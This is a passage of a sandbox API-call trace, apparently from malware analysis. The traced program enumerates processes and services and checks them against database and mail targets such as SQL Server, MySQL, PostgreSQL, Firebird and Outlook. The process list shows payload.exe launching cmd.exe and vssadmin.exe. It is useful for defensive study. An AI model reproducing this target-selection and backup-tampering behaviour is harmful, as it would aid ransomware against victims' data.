lpString2="csrss.exe") returned 1 [0049.495] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0049.496] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0049.496] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0049.496] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0049.496] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.496] lstrlenW (lpString="wininit.exe") returned 11 [0049.496] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0049.496] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0049.496] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0049.496] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.497] lstrlenW (lpString="csrss.exe") returned 9 [0049.497] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.498] lstrlenW (lpString="winlogon.exe") returned 12 [0049.498] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.499] lstrlenW (lpString="services.exe") returned 12 [0049.499] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.500] lstrlenW (lpString="lsass.exe") returned 9 [0049.500] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0049.500] lstrlenW (lpString="lsm.exe") returned 7 [0049.500] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.501] lstrlenW (lpString="svchost.exe") returned 11 [0049.501] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.502] lstrlenW (lpString="svchost.exe") returned 11 [0049.502] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.502] lstrlenW (lpString="svchost.exe") returned 11 [0049.502] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.503] lstrlenW (lpString="svchost.exe") returned 11 [0049.503] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.504] lstrlenW (lpString="svchost.exe") returned 11 [0049.504] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.504] lstrlenW (lpString="audiodg.exe") returned 11 [0049.504] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.505] lstrlenW (lpString="svchost.exe") returned 11 [0049.505] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.506] lstrlenW (lpString="svchost.exe") returned 11 [0049.506] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.506] lstrlenW (lpString="dwm.exe") returned 7 [0049.506] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.507] lstrlenW (lpString="explorer.exe") returned 12 [0049.507] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.508] lstrlenW (lpString="spoolsv.exe") returned 11 [0049.508] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.509] lstrlenW (lpString="taskhost.exe") returned 12 [0049.509] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.509] lstrlenW (lpString="svchost.exe") returned 11 [0049.509] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0049.510] lstrlenW (lpString="taskeng.exe") returned 11 [0049.510] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.511] lstrlenW (lpString="taskhost.exe") returned 12 [0049.511] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0049.511] lstrlenW (lpString="carried trinity.exe") returned 19 [0049.511] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0049.512] lstrlenW (lpString="heaven.exe") returned 10 [0049.512] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0049.513] lstrlenW (lpString="dell.exe") returned 8 [0049.513] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0049.513] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0049.945] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0049.946] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0049.946] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0049.947] lstrlenW (lpString="til ear equal.exe") returned 17 [0049.947] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0049.948] lstrlenW (lpString="itunes-bring.exe") returned 16 [0049.948] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0049.948] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0049.949] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0049.949] lstrlenW (lpString="philadelphia.exe") returned 16 [0049.949] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0049.950] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0049.950] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0049.951] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0049.951] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0049.951] lstrlenW (lpString="fraud stuck.exe") returned 15 [0049.951] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0049.952] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0049.952] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0049.953] lstrlenW (lpString="attended.exe") returned 12 [0049.953] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0049.953] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0049.953] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0049.954] lstrlenW (lpString="pan physician.exe") returned 17 [0049.954] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0049.955] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0049.955] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0049.956] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0049.956] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0049.956] lstrlenW (lpString="over-celebrity.exe") returned 18 [0049.956] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.957] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0049.957] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0049.958] lstrlenW (lpString="payload.exe") returned 11 [0049.958] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.958] lstrlenW (lpString="cmd.exe") returned 7 [0049.958] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.959] lstrlenW (lpString="conhost.exe") returned 11 [0049.959] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0049.960] lstrlenW (lpString="vssadmin.exe") returned 12 [0049.960] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0049.960] lstrlenW (lpString="VSSVC.exe") returned 9 [0049.960] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.961] lstrlenW (lpString="svchost.exe") returned 11 [0049.961] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0049.962] CloseHandle (hObject=0x208) returned 1 [0049.962] Sleep (dwMilliseconds=0x1f4) [0050.603] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626d98 [0050.605] EnumServicesStatusExW (in: hSCManager=0x626d98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0050.606] GetLastError () returned 0xea [0050.606] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x628500 [0050.606] EnumServicesStatusExW (in: hSCManager=0x626d98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x628500, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x628500, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0050.607] CloseServiceHandle (hSCObject=0x626d98) returned 1 [0050.607] lstrlenW (lpString="Appinfo") returned 7 [0050.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.607] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.607] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.608] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.608] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.608] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.608] lstrlenW (lpString="AudioSrv") returned 8 [0050.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0050.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0050.608] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0050.608] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0050.608] lstrlenW (lpString="BFE") returned 3 [0050.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.608] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.608] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.608] lstrlenW (lpString="CryptSvc") returned 8 [0050.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.608] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.608] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.608] lstrlenW (lpString="CscService") returned 10 [0050.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0050.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0050.608] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0050.608] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0050.608] lstrlenW (lpString="DcomLaunch") returned 10 [0050.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.608] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.608] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.609] lstrlenW (lpString="Dhcp") returned 4 [0050.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.609] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.609] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.609] lstrlenW (lpString="Dnscache") returned 8 [0050.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.609] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.609] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.609] lstrlenW (lpString="DPS") returned 3 [0050.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.609] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.609] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.609] lstrlenW (lpString="eventlog") returned 8 [0050.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0050.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0050.609] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0050.609] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0050.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0050.609] lstrlenW (lpString="EventSystem") returned 11 [0050.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.609] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.609] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.609] lstrlenW (lpString="gpsvc") returned 5 [0050.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.609] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.609] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0050.610] lstrlenW (lpString="iphlpsvc") returned 8 [0050.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0050.610] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0050.610] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.610] lstrlenW (lpString="LanmanServer") returned 12 [0050.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.610] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.610] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 